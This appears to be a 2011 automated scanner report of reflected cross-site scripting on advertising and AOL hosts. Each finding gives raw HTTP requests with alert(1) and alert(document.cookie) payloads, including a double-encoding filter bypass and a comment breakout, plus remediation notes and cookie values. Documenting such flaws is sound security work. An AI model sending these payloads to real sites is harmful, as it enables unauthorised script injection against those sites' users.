GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135729654%2522%253balert%25281%2529%252f%252fbaf59fc0de/1537.0.js.234x60/24516506?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link= HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 06 Feb 2011 20:35:59 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1917
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1db4%2522%253balert%25281%2529%252f%252f81b157f6309 was submitted in the REST URL parameter 3. This input was echoed as d1db4";alert(1)//81b157f6309 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60d1db4%2522%253balert%25281%2529%252f%252f81b157f6309/24516506?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link= HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 06 Feb 2011 20:36:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1918
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcde6"-alert(1)-"469bc60813b was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=dcde6"-alert(1)-"469bc60813b HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 06 Feb 2011 20:35:52 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1918
1.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ece2"-alert(1)-"d2c7ce0c658 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=&3ece2"-alert(1)-"d2c7ce0c658=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 06 Feb 2011 20:35:56 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1921
The value of the cnt request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload eb3a3%3balert(1)//c4478348b8 was submitted in the cnt parameter. This input was echoed as eb3a3;alert(1)//c4478348b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adserver/serve/js/fixed_size_unit.jsp?pid=16245&codeId=401&cnt=1eb3a3%3balert(1)//c4478348b8&width=574&height=100&pageId=20768960 HTTP/1.1 Host: ads.doclix.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: daily_freq_cap=WzI2LTEtMjAxMXwzNDE0fDFdWzI2LTEtMjAxMXwyMzM5fDFdWzI2LTEtMjAxMXwzNTE1fDJd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDJdWzUtMjAxMXwzMTA4fDJdWzUtMjAxMXwyOTAxfDFdWzUtMjAxMXwyODY4fDFdWzUtMjAxMXwzMDk5fDFdWzUtMjAxMXwyMzM5fDFdWzUtMjAxMXwzNTE1fDJd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDJdWzEtMjAxMXwzMTA4fDJdWzEtMjAxMXwyOTAxfDFdWzEtMjAxMXwyODY4fDFdWzEtMjAxMXwzMDk5fDFdWzEtMjAxMXwyMzM5fDFdWzEtMjAxMXwzNTE1fDJd
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:37:08 GMT Cache-Control: max-stale=0 max-age: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml" Connection: close Content-Length: 4045
var doclix_ads_domain = document.location.protocol == 'https:' ? document.domain == 'publisher.doclix.com' ? 'publisher.doclix.com' : 'track.doclix.com' : 'ads.doclix.com'; var doclix_ifrm_url_1eb3a3;alert(1)//c4478348b8 = document.location.protocol+'//'+doclix_ads_domain+'/adserver/serve/js/doclix_ad_ifrm.jsp?';
var ad_setup_str = 'save_ad_code=Save|delete_ad_code=|ad_unit_type_lu=true|unit_standard_size=574 ...[SNIP]...
The value of the cnt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec1a1'%3balert(1)//64b668db5b7 was submitted in the cnt parameter. This input was echoed as ec1a1';alert(1)//64b668db5b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adserver/serve/js/fixed_size_unit.jsp?pid=16245&codeId=401&cnt=1ec1a1'%3balert(1)//64b668db5b7&width=574&height=100&pageId=20768960 HTTP/1.1 Host: ads.doclix.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: daily_freq_cap=WzI2LTEtMjAxMXwzNDE0fDFdWzI2LTEtMjAxMXwyMzM5fDFdWzI2LTEtMjAxMXwzNTE1fDJd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDJdWzUtMjAxMXwzMTA4fDJdWzUtMjAxMXwyOTAxfDFdWzUtMjAxMXwyODY4fDFdWzUtMjAxMXwzMDk5fDFdWzUtMjAxMXwyMzM5fDFdWzUtMjAxMXwzNTE1fDJd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDJdWzEtMjAxMXwzMTA4fDJdWzEtMjAxMXwyOTAxfDFdWzEtMjAxMXwyODY4fDFdWzEtMjAxMXwzMDk5fDFdWzEtMjAxMXwyMzM5fDFdWzEtMjAxMXwzNTE1fDJd
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:37:07 GMT Cache-Control: max-stale=0 max-age: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml" Connection: close Content-Length: 4077
1.18. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.doclix.com
Path:
/adserver/serve/js/fixed_size_unit.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9a09'-alert(1)-'64baa0df0a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adserver/serve/js/fixed_size_unit.jsp?pid=16245&codeId=401&cnt=1&width=574&height=100&pageId=20768960&c9a09'-alert(1)-'64baa0df0a4=1 HTTP/1.1 Host: ads.doclix.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: daily_freq_cap=WzI2LTEtMjAxMXwzNDE0fDFdWzI2LTEtMjAxMXwyMzM5fDFdWzI2LTEtMjAxMXwzNTE1fDJd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDJdWzUtMjAxMXwzMTA4fDJdWzUtMjAxMXwyOTAxfDFdWzUtMjAxMXwyODY4fDFdWzUtMjAxMXwzMDk5fDFdWzUtMjAxMXwyMzM5fDFdWzUtMjAxMXwzNTE1fDJd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDJdWzEtMjAxMXwzMTA4fDJdWzEtMjAxMXwyOTAxfDFdWzEtMjAxMXwyODY4fDFdWzEtMjAxMXwzMDk5fDFdWzEtMjAxMXwyMzM5fDFdWzEtMjAxMXwzNTE1fDJd
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:37:08 GMT Cache-Control: max-stale=0 max-age: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml" Connection: close Content-Length: 3658
The value of the pageId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39457'-alert(1)-'cf387d9fc83 was submitted in the pageId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adserver/serve/js/fixed_size_unit.jsp?pid=16245&codeId=401&cnt=1&width=574&height=100&pageId=2076896039457'-alert(1)-'cf387d9fc83 HTTP/1.1 Host: ads.doclix.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: daily_freq_cap=WzI2LTEtMjAxMXwzNDE0fDFdWzI2LTEtMjAxMXwyMzM5fDFdWzI2LTEtMjAxMXwzNTE1fDJd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDJdWzUtMjAxMXwzMTA4fDJdWzUtMjAxMXwyOTAxfDFdWzUtMjAxMXwyODY4fDFdWzUtMjAxMXwzMDk5fDFdWzUtMjAxMXwyMzM5fDFdWzUtMjAxMXwzNTE1fDJd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDJdWzEtMjAxMXwzMTA4fDJdWzEtMjAxMXwyOTAxfDFdWzEtMjAxMXwyODY4fDFdWzEtMjAxMXwzMDk5fDFdWzEtMjAxMXwyMzM5fDFdWzEtMjAxMXwzNTE1fDJd
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:37:08 GMT Cache-Control: max-stale=0 max-age: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml" Connection: close Content-Length: 3655
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 223f2<script>alert(1)</script>718630f8bab was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1505691&pid=1990767223f2<script>alert(1)</script>718630f8bab&ps=-1&zw=627&zh=195&url=http%3A//www.dailyfinance.com/&v=5&dct=Business%20News%2C%20Stock%20Quotes%2C%20Investment%20Advice%20-%20DailyFinance&metakw=daily%20finance,dailyfinance,finance%20daily,business%20news,stock%20news,stock%20market%20news HTTP/1.1 Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 19:48:06 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User-Agent Content-Length: 2510
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "1990767223f2<script>alert(1)</script>718630f8bab"
The value of the placementId request parameter is copied into an HTML comment. The payload 6a27b--><script>alert(1)</script>4b7d7d76112 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=15056916a27b--><script>alert(1)</script>4b7d7d76112&pid=1990767&ps=-1&zw=627&zh=195&url=http%3A//www.dailyfinance.com/&v=5&dct=Business%20News%2C%20Stock%20Quotes%2C%20Investment%20Advice%20-%20DailyFinance&metakw=daily%20finance,dailyfinance,finance%20daily,business%20news,stock%20news,stock%20market%20news HTTP/1.1 Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 19:47:57 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/plain Content-Length: 3331
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "15056916a27b--><script>alert(1)</script>4b7d7d76112" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload 25700--><script>alert(1)</script>46ca0f2bc33 was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1505691&pid=1990767&ps=-125700--><script>alert(1)</script>46ca0f2bc33&zw=627&zh=195&url=http%3A//www.dailyfinance.com/&v=5&dct=Business%20News%2C%20Stock%20Quotes%2C%20Investment%20Advice%20-%20DailyFinance&metakw=daily%20finance,dailyfinance,finance%20daily,business%20news,stock%20news,stock%20market%20news HTTP/1.1 Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 19:48:09 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/plain Content-Length: 3770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-125700--><script>alert(1)</script>46ca0f2bc33" -->
The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload d3fe7<script>alert(1)</script>a3a3fcc09ff was submitted in the cc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ag.asp?cc=d3fe7<script>alert(1)</script>a3a3fcc09ff&source=js&ord=24803036 HTTP/1.1 Host: adsfac.us Proxy-Connection: keep-alive Referer: http://www.fanhouse.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: FSQAN007=pctl=310005&fpt=0%2C310005%2C&pct%5Fdate=4045&pctm=1&FL310005=1&FM30281=1&pctc=30281&FQ=1; FSddf63%3Cscript%3Ealert%28document=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4046&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; FSddf63%3Cscript%3Ealert%281%29%3C%2Fscript%3E8c447564c06=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4045&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; FSQTS038=pctl=287337&pctm=1&fpt=0%2C287337%2C&pct%5Fdate=4053&FL287337=1&FM31975=1&pctc=31975&FQ=1
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 293 Content-Type: text/html Expires: Sun, 06 Feb 2011 20:38:49 GMT Server: Microsoft-IIS/7.0 Set-Cookie: FSd3fe7%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea3a3fcc09ff0=uid=15683449; expires=Mon, 07-Feb-2011 20:39:48 GMT; path=/ Set-Cookie: FSd3fe7%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea3a3fcc09ff=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4054&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Sun, 06-Mar-2011 20:39:48 GMT; path=/ P3P: CP="NOI DSP COR NID CUR OUR NOR" Date: Sun, 06 Feb 2011 20:39:48 GMT Connection: close
The value of the echo request parameter is copied into the XML document as plain text between tags. The payload ad839<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>d81adcd233 was submitted in the echo parameter. This input was echoed as ad839<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>d81adcd233 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /pfsg/sdr?symbols=dji:$indu&service=chartdetail&f=xml&dtype=configurable&tf=d,1&gran=i&fids=i,h,l,o,c,v,pc&q=1&backfill=1&echouri=1&tm=1&dt=1&tr=1&echo=determineTDIsByResponsead839<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>d81adcd233 HTTP/1.1 Host: adv-chart-app.app.aol.com Proxy-Connection: keep-alive Referer: http://o.aolcdn.com/os/money/flash/MinimalChart.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; s_sess=%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B%20s_cc%3Dtrue%3B; s_pers=%20s_getnr%3D1297021708679-New%7C1360093708679%3B%20s_nrgvo%3DNew%7C1360093708704%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-store,no-cache,max-age=0,must-revalidate,proxy-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/xml;charset=ISO-8859-1 ntCoent-Length: 30296 Date: Sun, 06 Feb 2011 19:51:46 GMT Content-Length: 30296
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3fb31'><script>alert(1)</script>0eb8520e7cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /brands/dailyfinance3fb31'><script>alert(1)</script>0eb8520e7cd HTTP/1.1 Host: advertising.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.26. http://advertising.aol.com/brands/dailyfinance [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://advertising.aol.com
Path:
/brands/dailyfinance
Issue detail
